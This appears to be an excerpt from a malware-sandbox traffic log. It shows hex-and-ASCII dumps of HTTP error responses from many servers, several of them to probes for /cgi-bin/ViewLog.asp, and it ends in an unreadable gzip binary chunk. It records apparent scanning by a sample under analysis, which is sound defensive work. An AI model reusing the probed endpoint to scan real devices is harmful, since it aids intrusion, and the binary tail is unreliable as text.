            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:42 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:56:42 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun Oct 23 18:56:59 2022Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 10:53:34 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.0Date: Sun, 23 Oct 2022 15:56:48 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.0</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:49 GMTServer: ApacheContent-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 34 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:56:49 GMTServer: ApacheContent-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Microsoft-IIS/10.0Date: Sun, 23 Oct 2022 15:56:49 GMTContent-Length: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:49 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 34 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 30 2e 32 6b 2d 66 69 70 73 20 50 48 50 2f 35 2e 34 2e 31 36 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 66 72 65 65 70 62 78 2f 65 72 72 6f 72 2e 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 301 Moved PermanentlyDate: Sun, 23 Oct 2022 15:56:49 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16Location: https:///freepbx/error.htmlContent-Length: 235Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Perma
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:56:49 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:34 GMTServer: cisco-IOSConnection: closeAccept-Ranges: noneData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a Data Ascii: 404 Not Found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:56:50 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 16:39:40 GMTServer: App-webs/Content-Length: 195Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /cgi-bin/ViewLog.asp</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sun, 23 Oct 2022 15:56:52 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 10:57:10 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Oct 24 01:56:56 2022Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:56:58 GMTServer: ApacheStrict-Transport-Security: max-age=15768000Content-Length: 228Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 36 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 31 35 37 36 38 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.<br /></p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:56:58 GMTServer: ApacheStrict-Transport-Security: max-age=15768000Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Sun, 23 Oct 2022 15:56:58 GMTData Raw: 31 32 35 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 a3 ca 72 fe 7f 9e 02 b7 c3 f6 bd c1 f4 b0 0b d4 67 7a 7c d9 04 48 02 01 12 48 c8 e1 38 c1 52 2c 62 15 bb e4 f0 03 f9 35 fc 64 0e 75 cf d2 8b 34 33 e7 da 3f 5c 7f 5a b5 64 56 56 e6 97 99 74 56 fd f6 db 6f 9f fe 41 58 f1 1b 47 17 a1 b8 cd b3 cf bf 7d 7a fe 03 41 10 f4 29 06 6e f0 e5 67 0e 5a 17 8a db b6 ba 07 c7 2e e9 1f ef f8 b2 68 41 d1 de b7 a7 0a dc 41 fe 73 ef f1 ae 05 63 8b 5c 58 fc 0e f9 b1 5b 37 a0 7d ec da f0 9e b9 bb c9 c7 f5 63 70 7f a1 af cb ec 05 a3 a2 bc f7 2f 53 37 09 f5 da 8d 72 f7 cf 50 88 63 95 d4 a0 79 41 82 be 5a 5b b8 39 78 bc eb 13 30 54 65 dd be 58 36 24 41 1b 3f 06 a0 4f 7c 70 ff d4 f9 00 25 45 d2 26 6e 76 df f8 6e 06 1e b1 8f df 58 b5 49 9b 81 cf 24 4a 40 b3 b2 f6 92 20 00 c5 27 e4 79 f0 79 41 d3 9e 32 00 5d f4 f6 45 5d 7e d3 7c 21 be 34 af 0c 4e d0 7f 7c eb 5e 5a 58 16 ed 7d e8 e6 49 76 7a 80 d8 3a 71 b3 0f 90 0c b2 1e b4 89 ef 7e 80 1a b7 68 ee 1b 50 27 e1 ef ef c9 9a e4 0c 1e 20 8c ac c6 d7 93 59 52 80 fb 18 24 51 dc 3e 40 d8 47 12 67 28 1a 23 f1 e9 eb 55 9e eb a7 51 5d 76 45 70 ef 97 59 59 3f 40 ff 18 3e b5 d7 cb be ce e1 33 02 27 d0 d7 73 95 1b 04 49 11 3d 40 6f c6 73 b7 8e 92 e2 d5 f0 7f 7e fb d5 00 bf 4d ca e2 03 14 96 65 0b ea 37 fa 08 92 a6 ca dc d3 03 e4 65 a5 9f fe 1f 6c f7 f1 62 6a 37 29 de ed f4 4c 75 9f 81 b0 7d 80 dc ae 2d af 31 bd af 9f b5 f8 7e fe bb 30 10 86 be b4 c0 8b ad 6b d0 54 65 d1 80 fb a4 08 cb 37 db 7f d5 2b ff d4 ae 92 37 ad db 76 cd bd 5f 06 e0 1a 6a 9e cd 4f a1 e8 3f fd 88 ba 06 6e 53 16 b7 e9 71 ea 25 fd 8f 4c f0 56 a7 7e fb 74 ae 0f 2f cf 7b d9 eb fe 82 fc 1b a7 45 9f da 55 9e 17 7d 5e 80 e1 66 d7 d4 f5 02 ad 35 a8 80 db 3e 40 45 f9 e5 e7 4f 71 8d 4f 09 96 64 af e3 7a f6 d4 7e 49 22 f7 c6 a1 7e 9d c5 7d d2 82 bc 79 c3 e6 1b 92 70 b4 1a df 61 3b 29 be bb f2 94 b8 01 b4 97 f6 b8 0e 73 af 6c db 32 7f de e3 76 28 99 fc 0a ff b7 6a b8 98 fb 3e 00 7e 59 bb 97 a3 3e 40 5d 11 80 fa 12 84 ae 6b 9c c4 19 8e 67 7f 61 9f 87 b8 ec 41 fd e1 e6 74 58 fa 5d 73 7b da f5 db a4 7f eb 39 df 20 c1 4e c8 e9 e4 86 d7 de 42 f1 d7 40 73 cd 50 bf a0 c6 2e bb 15 ec 92 e2 29 66 5f 89 79 59 d2 b4 f7 4f 69 e5 02 f8 02 40 65 d7 36 49 00 9e 3a 3f 0d 83 d0 8d a8 f9 4a a6 2c 79 1b 1d b2 f2 e2 5f 97 c8 f8 fb 7b 4b bb 59 12 15 0f 90 0f 8a 16 d4 7f 02 f4 d7 76 7a 4a b8 0f 10 76 2b 86 3d 93 e7 6e f4 d6 8c df 0e 75 33 f6 3e 91 5e be 72 92 22 ba 16 fd 86 2f 4e e5 95 59 70 fb 94 ef 75 30 94 75 70 ef d5 c0 4d 1f a0 a7 3f f7 6e 96 fd fe e7 4f d5 80 ba 07 35 e4 06 41 0d 9a b7 21 e1 b6 08 df d9 5c 4d 9f 3f b2 10 f4 02 23 93 37 08 7e c7 f6 a7 4e fe 1a 7f 57 e8 93 fc ad de bd b2 0e 40 7d 3b 4f 57 a7 a7 6c 7b 3b 57 61 ef 82 d7 